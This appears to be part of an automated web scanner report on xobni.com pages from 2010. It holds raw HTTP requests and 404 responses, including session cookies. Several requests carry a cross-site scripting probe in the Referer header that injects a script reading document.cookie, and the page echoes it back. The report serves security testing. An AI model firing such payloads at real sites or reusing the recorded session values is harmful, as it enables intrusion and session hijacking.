       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/enterprise/contact?lc=en'>English</a><a href='/enterprise/contact?lc=de'>Deutsch</a><a href='/enterprise/contact?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;" id="menu_produc
...[SNIP]...

9.2. http://www.xobni.com/fr-fr/account.

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /fr-fr/account.

Request 1

GET /fr-fr/account. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/account.?lc=en'>English</a><a href='/fr-fr/account.?lc=de'>Deutsch</a><a href='/fr-fr/account.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordC
...[SNIP]...

Request 2

GET /fr-fr/account. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/account.?lc=en'>English</a><a href='/fr-fr/account.?lc=de'>Deutsch</a><a href='/fr-fr/account.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/pr
...[SNIP]...

9.3. http://www.xobni.com/fr-fr/legal/privacy.

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /fr-fr/legal/privacy.

Request 1

GET /fr-fr/legal/privacy. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7941

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/privacy.?lc=en'>English</a><a href='/fr-fr/legal/privacy.?lc=de'>Deutsch</a><a href='/fr-fr/legal/privacy.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/"
...[SNIP]...

Request 2

GET /fr-fr/legal/privacy. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7901

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/privacy.?lc=en'>English</a><a href='/fr-fr/legal/privacy.?lc=de'>Deutsch</a><a href='/fr-fr/legal/privacy.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'cli
...[SNIP]...

9.4. http://www.xobni.com/fr-fr/legal/tos.

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /fr-fr/legal/tos.

Request 1

GET /fr-fr/legal/tos. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7929

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/tos.?lc=en'>English</a><a href='/fr-fr/legal/tos.?lc=de'>Deutsch</a><a href='/fr-fr/legal/tos.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="r
...[SNIP]...

Request 2

GET /fr-fr/legal/tos. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/tos.?lc=en'>English</a><a href='/fr-fr/legal/tos.?lc=de'>Deutsch</a><a href='/fr-fr/legal/tos.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homep
...[SNIP]...

9.5. http://www.xobni.com/homepage/productmenu/free

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /homepage/productmenu/free

Request 1

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/free?lc=en'>English</a><a href='/homepage/productmenu/free?lc=de'>Deutsch</a><a href='/homepage/productmenu/free?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldown
...[SNIP]...

Request 2

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7751

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/free?lc=en'>English</a><a href='/homepage/productmenu/free?lc=de'>Deutsch</a><a href='/homepage/productmenu/free?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return fa
...[SNIP]...

9.6. http://www.xobni.com/homepage/productmenu/mobilebb

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /homepage/productmenu/mobilebb

Request 1

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
